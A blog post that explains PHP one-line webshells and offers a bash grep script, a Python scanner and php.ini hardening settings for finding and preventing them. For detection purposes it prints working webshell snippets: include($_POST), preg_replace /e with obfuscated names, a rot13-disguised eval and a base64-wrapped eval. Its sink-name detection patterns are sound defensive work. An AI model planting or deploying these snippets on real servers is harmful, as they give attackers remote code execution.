

PHP one-line webshells (一句话木马) and how to hunt them

Common webshells share the following features.

1. Receiving an external variable
Commonly: $_GET, $_POST
More covert: $_FILES, $_REQUEST...

2. Executing it
Once the data has been received it still has to be executed.
Commonly: eval, assert, preg_replace
Hidden variants:

include($_POST['a']);   // include() runs whatever file name the request supplies

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";   // function name assembled at runtime, so a plain grep for preg_replace misses it
$hh("/[discuz]/e",$_POST['h'],"Access");                 // the /e modifier evaluates the replacement ($_POST['h']) as PHP

@preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');   // str_rot13('riny') is 'eval'

Encoding functions such as urldecode, gzinflate and base64_decode are also used to hide the payload.

3. Writing files
To obtain more privileges.
For example: copy, file_get_contents, exec

The usual advice is to enable safe_mode or use disable_functions to harden the installation; some applications may then stop working. Basic security settings in php.ini:

expose_php = OFF
register_globals = Off
display_errors = Off
cgi.fix_pathinfo=0
magic_quotes_gpc = On
allow_url_fopen = Off
allow_url_include = Off
and configure open_basedir

Hunting for webshell scripts
Searching for the hidden signatures and entry points above finds most webshells.

#!/bin/bash

findpath=./
logfile=findtrojan.log

echo -e "$(date +%Y-%m-%d_%H:%M:%S) start\r" >> "$logfile"

# PHP files whose inode changed in the last 3 days
echo -e '============changetime list==========\r\n' >> "${logfile}"
find "${findpath}" -name "*.php" -ctime -3 -type f -exec ls -l {} \; >> "${logfile}"

# files that belong to no known user or group
echo -e '============nouser file list==========\r\n' >> "${logfile}"
find "${findpath}" -nouser -nogroup -type f -exec ls -l {} \; >> "${logfile}"

# PHP files containing the execution, decoding and input signatures listed above
echo -e '============php one word trojan ==========\r\n' >> "${logfile}"
find "${findpath}" -name "*.php" -exec egrep -I -i -C1 -H 'exec\(|eval\(|assert\(|system\(|passthru\(|shell_exec\(|escapeshellcmd\(|pcntl_exec\(|gzuncompress\(|gzinflate\(|unserialize\(|base64_decode\(|file_get_contents\(|urldecode\(|str_rot13\(|\$_GET|\$_POST|\$_REQUEST|\$_FILES|\$GLOBALS' {} \; >> "${logfile}"
# use -l instead of -C1 -H to print only the file names
echo -e "$(date +%Y-%m-%d_%H:%M:%S) end\r" >> "$logfile"

more "$logfile"
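The grep above matches literal function names, so the hidden variants shown earlier (a name built from concatenated strings, str_rot13/base64 wrapping, the preg_replace /e modifier) slip through. The following scanner is an added example, not code from the original post: it applies the same signature idea but also resolves those three obfuscations and rescans decoded base64 payloads. The SINK_NAMES list and the SAMPLES files are my own constructed inputs.

```python
import base64
import codecs
import re

# Signatures taken from the patterns the post describes: external input, execution
# sinks and the decoders used to hide them (SINK_NAMES is an assumed, trimmed list).
SINK_NAMES = ("eval", "assert", "system", "exec", "passthru", "shell_exec",
              "pcntl_exec", "include", "require", "preg_replace")
INPUT_RE = re.compile(r"\$_(?:GET|POST|REQUEST|FILES|COOKIE)\b|\$GLOBALS\b")
SINK_RE = re.compile(r"\b(?:" + "|".join(SINK_NAMES) + r")(?:_once)?\s*\(")
# preg_replace('/.../e', ...): the replacement string is evaluated as PHP code
E_MOD_RE = re.compile(r"""preg_replace\s*\(\s*['"]/.*?/[a-zA-Z]*e[a-zA-Z]*['"]""")
# $name = "p"."r"."e"...: a function name assembled from short string pieces
CONCAT_RE = re.compile(r"""\$(\w+)\s*=\s*((?:['"][^'"]{1,3}['"]\s*\.\s*){2,}['"][^'"]{1,3}['"])""")
ROT13_RE = re.compile(r"""str_rot13\s*\(\s*['"]([^'"]+)['"]\s*\)""")
B64_RE = re.compile(r"""base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")

def scan_php(src: str) -> list:
    """Return human-readable findings for one PHP source string (empty if clean)."""
    findings = []
    if INPUT_RE.search(src) and SINK_RE.search(src):
        findings.append("external input next to an execution sink")
    if E_MOD_RE.search(src):
        findings.append("preg_replace with /e modifier")
    for var, expr in CONCAT_RE.findall(src):
        name = "".join(re.findall(r"""['"]([^'"]+)['"]""", expr))
        if re.search(r"\$" + re.escape(var) + r"\s*\(", src):
            findings.append(f"variable function ${var}() resolves to {name}()")
    for lit in ROT13_RE.findall(src):
        decoded = codecs.decode(lit, "rot13")
        if decoded in SINK_NAMES:
            findings.append(f"str_rot13({lit!r}) decodes to {decoded}")
    for lit in B64_RE.findall(src):
        try:
            decoded = base64.b64decode(lit, validate=True).decode("utf-8", "ignore")
        except ValueError:
            continue
        # rescan the decoded payload so a wrapped one-liner is reported too
        findings += ["inside base64: " + f for f in scan_php(decoded)]
    return findings

# Constructed samples: the three variants shown in the post, a base64-wrapped
# one-liner, and a benign file that reads $_GET without executing anything.
SAMPLES = {
    "include": "<?php include($_POST['a']); ?>",
    "concat": '<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e", $_POST["h"], "Access"); ?>',
    "rot13": "<?php @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add'); ?>",
    "base64": "<?php eval(base64_decode('ZXZhbCgkX1BPU1RbJ2EnXSk7')); ?>",
    "benign": "<?php echo htmlspecialchars($_GET['name']); ?>",
}
```

Run scan_php over the contents of each .php file found by the script above to get a per-file list of findings instead of raw grep context.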

Posted in Security, Technology.



2 Responses


  1. ㄨ销声匿迹、Linux says

    Heh, I've visited your blog many times and I'm quite interested in your articles. Could we exchange links?

  2. C1G says

    Done.


